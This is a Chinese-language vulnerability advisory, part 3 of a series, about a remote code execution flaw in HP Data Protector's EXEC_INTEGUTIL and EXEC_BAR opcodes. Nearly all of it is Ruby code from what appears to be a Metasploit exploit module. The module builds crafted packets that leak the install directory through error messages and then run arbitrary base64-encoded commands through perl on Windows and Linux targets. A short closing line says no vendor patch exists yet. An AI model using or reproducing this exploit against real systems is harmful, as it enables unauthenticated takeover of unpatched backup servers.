INTEGUTIL远程代码执行漏洞(3)

def leak_hp_directory(rand_exec)
    connect
    pkt = build_pkt([
      "2", # Message Type
      rand_text_alpha(8),
      rand_text_alpha(8),
      rand_text_alpha(8),
      rand_text_alpha(8),
      rand_text_alpha(8),
      "28", # Opcode EXEC_INTEGUTIL
      rand_exec,
    ])

sock.put(pkt)
    begin
      res = sock.get_once(4)
    rescue EOFError
      disconnect
      return nil
    end

if res.nil?
      disconnect
      return nil
    else
      length = res.unpack("N")[0]
    end

begin
    res = sock.get_once(length)
    rescue EOFError
      return nil
    ensure
      disconnect
    end

if res.nil?
      return nil
    end

if res =~ /No such file or directory/ # Linux signature
      return res
    else # deal as windows target
      return Rex::Text.to_ascii(res).chop.chomp # Delete unicode last null
    end
  end

def parse_dir(data, clue)
    if data && data =~ /The system cannot find the file specified\..*(.:\\.*)bin\\#{clue}/
      dir = $1
      print_good("#{peer} - HP Data Protector directory found on #{dir}")
    elsif data && data =~ /\]\x00 (\/.*)lbin\/#{clue}\x00 \[\d\] No such file or directory/
      dir = $1
      print_good("#{peer} - HP Data Protector directory found on #{dir}")
    else
      dir = nil
    end

dir
  end

def valid_target?(dir)
    if target.name =~ /Windows/ && dir =~ /^[A-Za-z]:\\/
      return true
    elsif target.name =~ /Linux/ && dir.start_with?('/')
      return true
    end

false
  end

def default_hp_dir
    if target.name =~ /Windows/
      dir = 'C:\\Program Files\\OmniBack\\'
    else # linux
      dir = '/opt/omni/lbin/'
    end

dir
  end

def execute_windows(cmd, hp_dir)
    connect
    pkt = build_pkt([
      "2", # Message Type
      rand_text_alpha(8),
      rand_text_alpha(8),
      rand_text_alpha(8),
      rand_text_alpha(8),
      rand_text_alpha(8),
      "28", # Opcode EXEC_INTEGUTIL
      "perl.exe",
      "-I#{hp_dir}lib\\perl",
      "-MMIME::Base64",
      "-e",
      "system(decode_base64('#{Rex::Text.encode_base64(cmd)}'))"
    ])
    sock.put(pkt)
    disconnect
  end

def execute_linux(cmd, hp_dir)
    connect
    pkt = build_pkt([
      '2', # Message Type
      rand_text_alpha(8),
      rand_text_alpha(8),
      rand_text_alpha(8),
      rand_text_alpha(8),
      rand_text_alpha(8),
      '11', # Opcode EXEC_BAR
      rand_text_alpha(8),
      rand_text_alpha(8),
      rand_text_alpha(8),
      rand_text_alpha(8),
      rand_text_alpha(8),
      rand_text_alpha(8),
      rand_text_alpha(8),
      rand_text_alpha(8),
      rand_text_alpha(8),
      rand_text_alpha(8),
      rand_text_alpha(8),
      "../bin/perl",
      rand_text_alpha(8),
      "-I#{hp_dir}lib/perl",
      '-MMIME::Base64',
      '-e',
      "system(decode_base64('#{Rex::Text.encode_base64(cmd)}'))"
    ])
    sock.put(pkt)
    disconnect
  end
 end

建议：
厂商补丁：

HP
 --
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：